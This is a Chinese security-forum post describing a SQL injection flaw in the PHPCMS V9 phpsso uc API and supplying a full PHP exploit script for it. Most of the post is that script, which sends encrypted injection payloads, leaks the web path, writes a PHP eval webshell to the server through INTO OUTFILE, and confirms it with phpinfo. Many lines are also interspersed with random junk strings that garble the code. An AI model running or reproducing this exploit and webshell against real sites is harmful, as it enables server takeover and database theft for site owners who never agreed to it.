中国网络渗透测试联盟

标题: PHPCMS V9 uc API SQL注入漏洞 [打印本页]

---

作者: admin    时间: 2013-2-9 01:22
标题: PHPCMS V9 uc API SQL注入漏洞
PHPCMS V9版于2010年推出，是应用较为广泛的建站工具。第三方数据显示，目前使用PHPCMS V9搭建的网站数量多达数十万个，包括联合国儿童基金会等机构网站，以及大批企业网站均使用PHPCMS V9搭建和维护。
0 d: M# m, o6 H
# M7 f7 |5 p6 X' _6 a, ~8 b! B所有使用PHPCMSV9搭建的网站均存在SQL注入漏洞，可能使黑客利用漏洞篡改网页、窃取数据库，甚至控制服务器。未启用ucenter服务的情况下，uc_key为空，define('UC_KEY', pc_base::load_config('system', 'uc_key'));deleteuser接口存在SQL注入漏洞。若MYSQL具有权限，可直接get webshell。
* i9 ^# {/ x  x# r, K& l: K8 k
3 k) i6 e+ k: Y4 h漏洞分析：
1.未启用ucenter服务的情况下uc_key为空
define('UC_KEY', pc_base::load_config('system', 'uc_key'));
2. deleteuser接口存在SQL注入漏洞，UC算法加密的参数无惧GPC,程序员未意识到$get['ids']会存在SQL注入情况。
    public function deleteuser($get,$post) {
        pc_base::load_app_func('global', 'admin');
        pc_base::load_app_class('messagequeue', 'admin' , 0);
        $ids = new_stripslashes($get['ids']);
+ Z9 Y% D0 B, G        $s = $this->member_db->select("ucuserid in ($ids)", "uid");
SQL语句为
, {8 ?( e% k* m* C" f: ?) uSELECT `uid` FROM `phpcmsv9`.`v9_sso_members` WHERE ucuserid in ($ids)
* q; `( l: P5 A' M
利用代码，随便拼了个EXP，找路径正则写得很挫有BUG，没有注其他表了，懒得改了，MYSQL有权限的话直接get webshell
1 p( @3 |1 M- e, o<?php
print_r('
---------------------------------------------------------------------------
* M- |2 r9 z3 P9 z) m7 N# Z- }. NPHPcms (v9 or Old Version) uc api sql injection 0day
: `9 k) M4 O/ Qby rayh4c#80sec.com
---------------------------------------------------------------------------
');
( w7 f) {- ^- G) q) m
3 B7 _! h" V& g8 w9 q3 Dif ($argc<3) {
! K; M3 G( m5 t3 {9 P9 x4 W    print_r('
---------------------------------------------------------------------------
' l& j7 m0 x% ]& v- I4 }- H0 z7 cUsage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
/ [: B& q8 l0 {path:      path to phpcms
+ E$ @$ i  M" i1 Z2 c' d+ D! aOptions:
-p[port]:    specify a port other than 80
-P[ip:port]: specify a proxy
8 [- z2 K) N7 h, R! pExample:
  Z1 s* |) D. r& u8 Fphp '.$argv[0].' localhost /
( V9 G$ T$ X4 w7 U) c- d! ephp '.$argv[0].' localhost /phpcms/ -p81
php '.$argv[0].' localhost /phpcms/ -P1.1.1.1:80
# R& v4 G( X/ S* s+ p' A4 z# f6 m---------------------------------------------------------------------------
');
    die;
1 x) \" E3 a$ W& b# P: E2 ]}

! C$ d% n, T, Q2 ~error_reporting(7);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
9 z  }1 r1 p" A& k" J9 P
) [- I! [, B5 `5 d1 T, E5 x4 ]function quick_dump($string)
{
# i8 [6 O0 q9 Y: s/ T" }  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
% J9 M& b6 b* p) F   else
   {$result.="  ".$string[$i];}
* z. m: O( c: O   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
* r$ t# W. c! }% Z3 H& q( R   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
return $exa."\r\n".$result;
}
4 U% x* s6 f8 o- T$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
- p4 m  M( i8 J3 ]
. l6 m& w: I$ n4 }9 k/ kfunction send($packet)
{
) Z0 p% _3 [8 ~- ?) Y* s; r+ u  w# S1 f  global $proxy, $host, $port, $html, $proxy_regex;
6 E" U) ~  b5 x1 u+ }& d  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
  g+ H) c# t# K) h7 d      echo 'No response from '.$host.':'.$port; die;
    }
5 `# e8 [* Z+ Q  J5 T  }
  else {
5 D* y' a+ ^. Z* F( M; |        $c = preg_match($proxy_regex,$proxy);
0 a  i* Y4 z$ v3 r+ ]    if (!$c) {
      echo 'Not a valid proxy...';die;
1 t& U6 c2 `( i* e0 ?% E" u    }
9 t6 A& [/ p0 i3 O9 i. W$ d% [' \1 P    $parts=explode(':',$proxy);
* t9 E, d# s6 y4 m  B% H& o    $parts[1]=(int)$parts[1];
4 q. h5 W, B+ p, d5 b/ Y    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
" z9 O# A# b0 g' |    $ock=fsockopen($parts[0],$parts[1]);
. m/ l! w) e  }    if (!$ock) {
* f7 h# }, g+ k3 @, f( e      echo 'No response from proxy...';die;
" G: i' ~$ F! l: Q: Y        }
  }
  fputs($ock,$packet);
5 c" m# g; w; }' s4 p  if ($proxy=='') {
6 s: N- v  r% n4 V0 u: T    $html='';
    while (!feof($ock)) {
$ i/ i4 L# z) Y' Y      $html.=fgets($ock);
    }
  }
  else {
    $html='';
- L& a0 K/ z1 \( x& q' r) f    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
" g7 D2 S1 b% A0 S& m    }
  }
) \. `& z$ U+ i  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$ b% A" b. f: W7 d9 X& d( y5 a! U* G$port=80;
$proxy="";
9 H/ }; W4 S2 I* K0 |) |  Z6 w) V2 Dfor ($i=3; $i<$argc; $i++){
" o* Y# W' l. }/ G$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=(int)str_replace("-p","",$argv[$i]);
1 `( g) Q5 W2 M) f  z8 N8 @}
3 e# ?" S  R/ b; l+ ]if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+ c7 O9 d) m0 n  L, {
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
' r$ W  H& F$ w/ H; v
: a! u; P8 p) u: C0 A5 i    $ckey_length = 4;
; ~+ G: g# D, r8 d8 z1 H. u* V. a7 c
: v- t( a+ `$ w# w& x$ S8 {! F    $key = md5($key ? $key : '');
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
- J  ]+ o# g0 z/ [7 g; y
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);

- e$ c1 ?7 P$ s( Q    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$ V) F- x, X: D% @    $string_length = strlen($string);

    $result = '';
& Y- a- J" ]6 D    $box = range(0, 255);
- O$ I; v) P) D: E. u& P0 h- w* Y1 y9 c
    $rndkey = array();
' }( e8 m4 ?% E- h1 ~$ x5 l; x    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
& p, Z4 r' c' x8 h1 d$ `' i    }

    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
0 c! ?8 s$ M4 ~8 X% S8 v  t  _        $tmp = $box[$i];
( ]9 V& i7 I: j% P, d  ?        $box[$i] = $box[$j];
        $box[$j] = $tmp;
, Y8 E7 i3 C, d$ X, h/ }- c    }

  x$ x+ X% [3 O7 J2 L: [0 L    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
, X$ t& m; v6 b6 |. z$ }        $tmp = $box[$a];
2 F4 k0 U  X$ S  R/ b        $box[$a] = $box[$j];
        $box[$j] = $tmp;
+ C0 M. |8 q: Q) ~: O: g7 {        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }

/ t3 q/ M& I% ^8 r: U  w6 I$ T    if($operation == 'DECODE') {
9 ?) b6 @- e( m! k. y        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
( @) N) E4 [$ M7 \8 S+ y3 B            return substr($result, 26);
        } else {
            return '';
        }
    } else {
+ R" O$ S1 I1 j/ m, t' U        return $keyc.str_replace('=', '', base64_encode($result));
' M: e& u2 X) ~; V! u    }
  R; Z) P* w6 f# j$ ~
6 W8 m- l$ Q$ I& q+ }( o}

5 ]& ~/ [4 O4 U% Y$SQL = "time=999999999999999999999999&ids=1'&action=deleteuser";
$SQL = urlencode(authcode($SQL, "ENCODE", ""));
echo "[1] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
, R" l% }' ^% v1 q3 Y+ t- W7 s4 D$packet.="User-Agent: Mozilla/5.0\r\n";
/ o9 ?) s2 U1 ]% e9 f$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
, p% P  m: I" }send($packet);
' N6 M; b) h8 B5 \" m# cif(strpos($html,"MySQL Errno") > 0){
echo "[2] 发现存在SQL注入漏洞"."\n";
echo "[3] 访问 http://".$host.$p."phpsso_server/api/logout.php \n";
$packet ="GET ".$p."phpsso_server/api/logout.php"." HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
* C, ^  \+ L2 }5 `, Fsend($packet);
0 ?% @4 v. `5 S3 wpreg_match('/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/',$html, $matches);
//print_r($matches);
& W( a" p2 g8 W  [7 e' Rif(!empty($matches)){
echo "[4] 得到web路径 " . $matches[0]."\n";
echo "[5] 尝试写入文件 ". str_replace("\\","/",$matches[0]) ."caches/shell.php"."\n";
% F( Y3 I, F! w5 c% Z$SQL = "time=999999999999999999999999&ids=1)";
: B8 G0 s9 {% g1 D0 `$SQL.=" and 1=2 union select '<?php eval($"."_REQUEST[a]);?>' into outfile '". str_replace("\\","/",$matches[0]) ."caches/shell.php'#";
" k7 J- F2 _  R1 o" w6 e$SQL.="&action=deleteuser";
$SQL = urlencode(authcode($SQL, "ENCODE", ""));
echo "[6] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
  `& _( m6 _& T& ^$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
send($packet);
( S% J0 b; R' W: }: L, Cif(strpos($html,"Access denied") > 0){
) H; o+ o+ t* R2 z# Wecho "[-] MYSQL权限过低 禁止写入文件 ";
) u& l2 J1 J  }, I5 I. M: Wdie;
, _. n, U/ A: ?  a8 ^  ]* T}
4 U: \2 }8 j, z* R  B8 A5 L' jecho "[6] 访问 http://".$host.$p."phpsso_server/caches/shell.php"."\n";
1 F2 d  @9 ^& q6 o) b$packet ="GET ".$p."phpsso_server/caches/shell.php?a=phpinfo(); HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
: L8 l$ J, |! S0 h' M5 ?. H( P/ w+ x, |$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
send($packet);
1 m. y/ }9 N6 I2 a0 Rif(strpos($html,"<title>phpinfo()</title>") > 0){
echo "[7] 测试phpinfo成功！shell密码是a ! enjoy it ";
! [9 g% f* j; T}
, V. N  g, L; {2 ]5 G- A, ^}else{
7 W: G$ U# l) U% H# }6 |9 `echo "[-]未取到web路径 ";
}
}else{
echo "[*]不存在SQL注入漏洞"."\n";
) g+ V- a5 b8 K1 T7 y}
8 x$ ?9 @! X. b2 c
5 J- Z" p& d1 Y* {4 r9 Z?>
" i% V% h$ q9 A9 v7 g/ F, ]% M* z

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2